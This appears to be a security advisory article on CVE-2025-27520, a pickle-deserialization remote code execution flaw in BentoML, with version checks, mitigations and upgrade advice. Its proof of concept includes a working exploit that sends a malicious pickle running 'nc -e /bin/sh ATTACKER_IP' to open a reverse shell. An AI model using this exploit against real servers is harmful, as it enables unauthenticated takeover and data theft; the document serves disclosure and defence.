
Critical RCE Vulnerability in BentoML (CVE-2025-27520): What You Need to Know

What is BentoML?

BentoML is a popular Python framework designed for building and deploying AI-powered online services. It enables developers to package machine learning models into production-ready APIs with minimal effort, supporting high-performance serving and scalable deployment.

What is This Vulnerability About?

A critical security vulnerability (CVE-2025-27520, CVSS 9.8) has been discovered in BentoML versions 1.3.8 through 1.4.2. This remote code execution (RCE) flaw allows unauthenticated attackers to execute arbitrary code on servers running vulnerable BentoML instances.
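
To make the affected range concrete, here is a minimal sketch of a version check. The bounds are simply the range stated above (1.3.8 through 1.4.2) and should be confirmed against the official advisory. The helper names parse_version, is_affected, and installed_bentoml_is_affected are hypothetical, and the parsing is deliberately crude: it ignores pre-release suffixes.

```python
from importlib import metadata
from typing import Optional, Tuple

# Bounds taken from the range stated in this article; verify against the advisory.
FIRST_AFFECTED = (1, 3, 8)
LAST_AFFECTED = (1, 4, 2)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn 'X.Y.Z' into a tuple of ints, dropping any non-numeric suffix."""
    parts = []
    for piece in version.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def is_affected(version: str) -> bool:
    """Return True if the version falls inside the stated vulnerable range."""
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED


def installed_bentoml_is_affected() -> Optional[bool]:
    """Check the locally installed bentoml package; None if it is not installed."""
    try:
        return is_affected(metadata.version("bentoml"))
    except metadata.PackageNotFoundError:
        return None
```

Running installed_bentoml_is_affected() inside the serving environment gives a quick first answer. It does not replace a proper dependency audit.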

Discovered by GitHub user c2an1 and further analyzed by Checkmarx researchers, this vulnerability is particularly dangerous because:

  • It requires no authentication
  • It can lead to complete server compromise
  • It’s a regression of CVE-2024-2912 (previously fixed in v1.2.5 but reintroduced in v1.3.8)

Technical Analysis

The vulnerability resides in the deserialize_value() function within serde.py, which improperly handles serialized data from HTTP requests:

def deserialize_value(self, payload: Payload) -> t.Any:
    if "buffer-lengths" not in payload.metadata:
        # payload.data comes from the HTTP request, so this unpickles attacker-controlled bytes
        return pickle.loads(b"".join(payload.data))

The critical issues are:

1. Insecure Deserialization: The function uses Python’s pickle module to deserialize untrusted input without proper validation

2. Direct HTTP Input: The payload comes directly from HTTP requests that attackers can manipulate

3. Pickle Risks: Python’s pickle can execute arbitrary code during deserialization
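
The third point is the heart of the problem, and a harmless example makes it visible. In this minimal sketch, a class (the hypothetical name Harmless) uses __reduce__ to tell pickle which callable to invoke on load. The built-in sum stands in for whatever function an attacker would choose.

```python
import pickle


class Harmless:
    """On unpickling, pickle calls the callable returned by __reduce__."""

    def __reduce__(self):
        # (callable, args): pickle.loads will evaluate sum([40, 2])
        return (sum, ([40, 2],))


blob = pickle.dumps(Harmless())

# The loader never rebuilds a Harmless object; it runs the call stored in the data.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

The bytes alone decide which function runs, so any endpoint that passes request bodies to pickle.loads hands that choice to the sender.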

Exploitation Method

Attackers can exploit this by crafting malicious pickle payloads that execute system commands when deserialized. Here’s a proof-of-concept:

1. Set up a vulnerable environment (SERVER_IP):

pip install bentoml==1.4.2

2. Create service.py:

from __future__ import annotations
import bentoml

@bentoml.service(resources={"cpu": "4"})
class Summarization:
    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        return ["Summarized: " + text for text in texts]

3. Start service:

bentoml serve

4. Attack from another machine (ATTACKER_IP):

import pickle
import os
import requests

class Exploit:
    def __reduce__(self):
        return (os.system, ('nc -e /bin/sh ATTACKER_IP  1234',))
        
payload = pickle.dumps(Exploit())
requests.post(
    "http://SERVER_IP:3000/summarize",
    data=payload,
    headers={'Content-Type': 'application/vnd.bentoml+pickle'}
) 

5. Receive reverse shell:

nc -lvvp 1234
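
The request in step 4 stands out by its Content-Type header, application/vnd.bentoml+pickle. Where an immediate upgrade is not possible, one stopgap is to reject such requests before they reach BentoML. The sketch below is an illustration under assumptions, not BentoML's own fix: a generic ASGI middleware (the class name BlockPickleContentType and the helper probe are hypothetical) that answers HTTP 415 for that content type. How to wire it into a given deployment, and whether the same rule belongs in a reverse proxy or WAF instead, is left open.

```python
import asyncio

BLOCKED_CONTENT_TYPE = b"application/vnd.bentoml+pickle"


class BlockPickleContentType:
    """Generic ASGI middleware that rejects the pickle content type with 415."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            headers = dict(scope.get("headers", []))
            # Drop parameters such as "; charset=..." and normalize case.
            content_type = headers.get(b"content-type", b"")
            content_type = content_type.split(b";")[0].strip().lower()
            if content_type == BLOCKED_CONTENT_TYPE:
                await send({
                    "type": "http.response.start",
                    "status": 415,
                    "headers": [(b"content-type", b"text/plain")],
                })
                await send({
                    "type": "http.response.body",
                    "body": b"Unsupported Media Type",
                })
                return
        await self.app(scope, receive, send)


async def _ok_app(scope, receive, send):
    """Stand-in for the real application: always answers 200."""
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})


def probe(content_type: bytes) -> int:
    """Send one fake POST through the middleware and return the status code."""
    sent = []

    async def send(message):
        sent.append(message)

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    scope = {
        "type": "http",
        "method": "POST",
        "path": "/summarize",
        "headers": [(b"content-type", content_type)],
    }
    asyncio.run(BlockPickleContentType(_ok_app)(scope, receive, send))
    return sent[0]["status"]
```

A filter like this only narrows the exposed surface. It is no substitute for running a patched release.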

Impact

Successful exploitation can lead to:

  • Complete server takeover
  • Data theft (including sensitive AI models)
  • Installation of persistent backdoors
  • Lateral movement in the network

Conclusion

CVE-2025-27520 is a severe threat to organizations running vulnerable BentoML versions. Because it is easy to exploit and gives an attacker full control of the server, affected deployments should be upgraded to a patched release (1.4.3 or later) immediately. This case also highlights the importance of:

  • Maintaining consistent security fixes across versions
  • Properly vetting serialization/deserialization processes
  • Implementing defense-in-depth for AI infrastructure
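
As one illustration of vetting deserialization, the Python documentation describes restricting which globals an unpickler may resolve. The sketch below follows that pattern. The allow-list contents and the names RestrictedUnpickler, restricted_loads, CallsSum, and is_rejected are assumptions made for this example, and nothing here reflects how BentoML itself was patched. Where the data format allows it, avoiding pickle for untrusted input altogether (for example, by using JSON) is the more robust choice.

```python
import builtins
import io
import pickle

# Only these builtins may be resolved while unpickling (illustrative allow-list).
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside the allow-list."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() using the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallsSum:
    """Harmless stand-in for a payload that asks the loader to call a function."""

    def __reduce__(self):
        return (sum, ([40, 2],))


def is_rejected(data: bytes) -> bool:
    """Return True if the restricted loader refuses the pickle."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False
```

Plain containers of strings and numbers still load, while any pickle that references a callable outside the allow-list is refused before the call happens.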
